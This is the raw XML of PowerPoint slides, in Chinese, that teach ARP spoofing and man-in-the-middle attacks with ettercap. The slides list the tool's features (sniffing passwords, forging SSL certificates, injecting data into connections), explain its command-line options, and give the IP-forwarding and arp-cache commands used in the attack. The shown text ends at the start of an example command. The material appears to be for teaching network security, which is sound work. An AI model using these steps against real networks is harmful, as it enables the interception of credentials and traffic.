              <a:t> -d 10.1.10.118 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>删除</a:t>
            </a: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zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pP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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>n|awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ‘/^[1-9]/{print “</a:t>
            </a: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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d  ” $1}’|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –x  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>清除所有</a:t>
            </a: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zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406161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ettercap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42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54359" y="1509742"/>
            <a:ext cx="9554548" cy="445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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SSH1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：可以嗅探到账户和密码，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SSH1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>连接中的数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>是第一款在全双工通信中嗅探嗅探的软件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：可以嗅探到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>发送假证书和会话密钥给客户端解密</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在已建立的连接中注入字符串：你可以注入字符到服务或者已激活的连接中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Packet filtering/dropping: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以设置一个过滤脚本，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>连接中可以搜索指定的字符串，然后用自己的数据替换掉原数据包中的字符串（或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>）或者整个数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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50" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Plug-ins support : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>接口创建自己的插件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以嗅探到这些密码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG (other protocols coming soon…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>被动式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TCP_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>指纹识别操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>被动扫描局域网（不发送任何数据包），收集局域网中主机信息：操作系统，运行服务，开放端口，网络，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>地址和网络适配器供应商</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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05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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>结束一个连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以连接列表中结束所有你想结束的连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34957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Ettercap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选项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43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22309" y="1720840"/>
            <a:ext cx="8388221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500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  -M, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:ARGS&gt;      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>攻击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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-o, –only-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>不嗅探，只执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>攻击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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-B, –bridge &lt;IFACE&gt;              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用桥接嗅探（需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>嗅探时使用的网卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>			             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>接口，嗅探两块网卡之间的数据包）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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-p, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nopromisc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>不要将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>放入混杂模式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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-S, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nosslmitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>不要伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>证书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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-u, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unoffensive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>不要转发数据包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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-r, –read &lt;file&gt;                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件读取数据 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;file&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  -f, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pcapfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> &lt;string&gt;          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  -R, –reversed                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用逆向目标反馈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t, –proto &lt;proto&gt;                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>只嗅探该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>（默认是全部）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327363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arp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中间人欺骗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44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84690" y="14139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开启转发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>echo 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip_forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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999" y="2196108"/>
            <a:ext cx="6639119" cy="3231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84689" y="2655080"/>
            <a:ext cx="904166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ettercap –T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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文本模式启动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ettercap –C  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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仿图形模式启动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ettercap –C  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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图形模式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实例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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tqi</a:t>
            </a:r>
            <a:r>
